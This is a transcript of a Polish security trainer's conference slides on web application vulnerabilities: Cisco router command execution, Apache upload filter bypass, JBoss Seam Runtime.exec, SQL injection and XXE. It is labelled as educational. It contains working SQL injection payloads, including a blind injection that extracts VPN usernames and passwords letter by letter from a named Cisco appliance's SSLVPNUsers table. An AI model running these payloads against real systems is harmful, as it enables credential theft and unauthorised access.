Wybrane podatności aplikacji webowych - Michał Sajdak

Wybrane podatności w aplikacjach webowych

Michał Sajdak, CISSP, CEH, CTT+

www.securitum.pl

www.sekurak.pl

http://www.securitum.pl/

http://www.sekurak.pl/

O Prelegencie

Michał Sajdak <at> securitum.pl

Testy bezpieczeństwa aplikacji

Szkolenia z security - również dla testerów programistów

http://securitum.pl/

2 Copyright 2014 Securitum

www.securitum.pl


Agenda

OS Command EXEC 1. Cisco RVS 4000

2. Jak omijać filtry w uploadzie?

3. Biblioteka JBoss Seam

4. Cisco Security Appliance (jeśli będzie czas) OS Command EXEC + SQLi

5. XXE (XML eXternal Entities)

Info tylko w celach edukacyjnych!


www.securitum.pl

Cisco RVS 4000

Security router

VPN, Firewall, IPS, …


www.securitum.pl

Cisco RVS 4000


www.securitum.pl

Upload / Apache – omijanie filtrów

Formularze zazwyczaj blokują upload plików wykonywalnych (np. php)

Edytory wizualne

Uploady CV

Etc.

Ale często stosują… blacklisting Czyli uniemożliwiają upload plików z rozszerzeniem .php / .aspx / itd


www.securitum.pl

Upload / Apache – omijanie filtrów

Zagadka

W jaki sposób Apache HTTP server zinterpretuje plik:

siekiera.jpg.php.wnk2j3.tralalala.sekurak

Jako txt ?

Jako PHP ?

Jako jpg ?


www.securitum.pl


www.securitum.pl

OS Command Exec – JBoss Seam

Dość stara podatność

Ale będąca przykładem ogólniejszego trendu:

Używamy biblioteki X, która w momencie uruchomienia systemu jest bezpieczna

Mija Y czasu… i w bibliotece znane są krytyczne podatności

Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/


www.securitum.pl

http://blog.o0o.nu/


Dość stara podatność

Można w sposób nieuwierzytelniony wywołać instancje klas… i dalej wołać metody

W szczególności Runtime.exec(„calc.exe”)


www.securitum.pl


Na docelowych systemach możemy mieć różne wersje javy

Więc należy w danym przypadku zlokalizować indeksy zadeklarowanych metod:

public static java.lang.Runtime java.lang.Runtime.getRuntime()

Process java.lang.Runtime.exec(java.lang.String)


www.securitum.pl


Jeśli znajdziemy starego JBossa prawie gwarancja że mamy nieuwierzytelniony OS Command Exec

Na systemach Windows – często Administrator

Podatne też inne javowe app servery

De facto jest to błąd w bibliotece nie w app serverze..


www.securitum.pl


Zobaczmy


www.securitum.pl

SQL injection

http://site.pl/news.php?id=10

SELECT * FROM news WHERE id = 10 AND active = 1

http://site.pl/news.php?id=10%20OR%201=1%23

SELECT * FROM news WHERE id = 10 OR 1=1# AND active = 1


www.securitum.pl

http://site.pl/news.php?id=10

http://site.pl/news.php?id=10 OR 1=1

SQL injection

http://site.pl/news.php?id=-1 UNION ALL SELECT user,password, NULL, NULL FROM users#

SELECT * FROM news WHERE id = -1 UNION ALL SELECT user,password, NULL, NULL FROM users# AND active = 1


www.securitum.pl












SQL injection – przykład na ekranie logowania

Cisco Security Appliance (SA 520) $SQL = „SELECT * FROM users WHERE login = ‘$login’ AND password = ‘$password’

Kontrolujemy login i hasło

Zobaczmy co się stanie jeśli użyjemy jako login/password ciągu: ‘ or ‘1’=‘1

$SQL = „SELECT * FROM users WHERE login = ‘’ or ‘1’=‘1’ AND password = ‘’ or ‘1’=‘1’

Copyright 2015 Securitum www.securitum.pl

16


SA 500 Appliance $SQL = „SELECT * FROM users WHERE login = ‘’ or ‘1’=‘1’ AND password = ‘’ or ‘1’=‘1’

Zwraca wszystkie wiersze z tabeli

Użyjmy tego na SA500

Możemy tutaj użyć techniki blind SQL injection


17


SA 500 Cel – chcemy pobrać wszystkie loginy i hasła (w plaintext)


18


Następne kroki Potrzebujemy znać typ bazy danych

Potrzebujemy wiedzieć w jakiej tabeli przechowywane są dane o użytkownikach oraz:

jak nazywają się kolumny przechowujące loginy / hasła Wszystkie te informacje mogą być uzyskane dzięki analizie whitebox

Baza: SQLLite

Nazwa tabeli: SSLVPNUsers

Kolumny: Username / Password


19


Pełne zapytanie pobierające użytkowników / hasła wygląda tak:

SELECT Username, Password FROM SSLVPNUsers

Ale nie możemy tego użyć bezpośrednio Ekran logowania nie wyświetla nic poza komunikatami o błędach

Copyright 2015 Securitum

www.securitum.pl

20


Pobierzemy więc użytkowników hasła litera po literze

Jak to zrobić? Potrzebujemy trochę praktyki z SQL ;-)


21


SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0

Pobiera pierwsze hasło w bazie

substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)

Pobiera pierwszą literę pierwszego hasła w bazie

Copyright 2015 Securitum

www.securitum.pl

22


Nasz login będzie następujący:

‘ OR substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)=‘a’--

Co skutkuje następującym zapytaniem:

SELECT * FROM SSLVPNUser WHERE login = ‘‘ OR substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)=‘a’--’ AND password = ‘$password’

Zwraca ono „invalid username” kiedy pierwsza litera hasła != ‘a’

Zwraca ono „inny błąd” kiedy pierwsza litera hasła = ‘a’


23

XXE (XML eXternal Entities)

Mało znany problem…ale dość istotny

W 2013 roku Reginaldo Silva otrzymał w ramach bugbounty z Facebooka $33 500

RCE z wykorzystaniem XXE

FB wypuścił patcha w 3.5h od zgłoszenia (!)


www.securitum.pl


Encje znany z HTML-a: < lub <

<

" ' & µ … Ogólnie:

&nazwa_encji; &#numer_encji;


www.securitum.pl

Renderowanie encji w HTML

W XML-u: działa to podobnie…


www.securitum.pl


… możemy definiować własne encje

<!ENTITY name "value">


www.securitum.pl


www.securitum.pl


Zobaczmy

http://sekurak.pl/tag/xxe/

dwa artykuły – jeden podstawowy,

drugi – bardziej zaawansowany.


www.securitum.pl




Dziękuję za uwagę

Pytania?

Kontakt: [email protected]


Szkolenia / testy bezpieczeństwa aplikacji


www.securitum.pl

mailto:[email protected]


Wybrane podatności aplikacji webowych - Michał Sajdak

Education

Transcript of Wybrane podatności aplikacji webowych - Michał Sajdak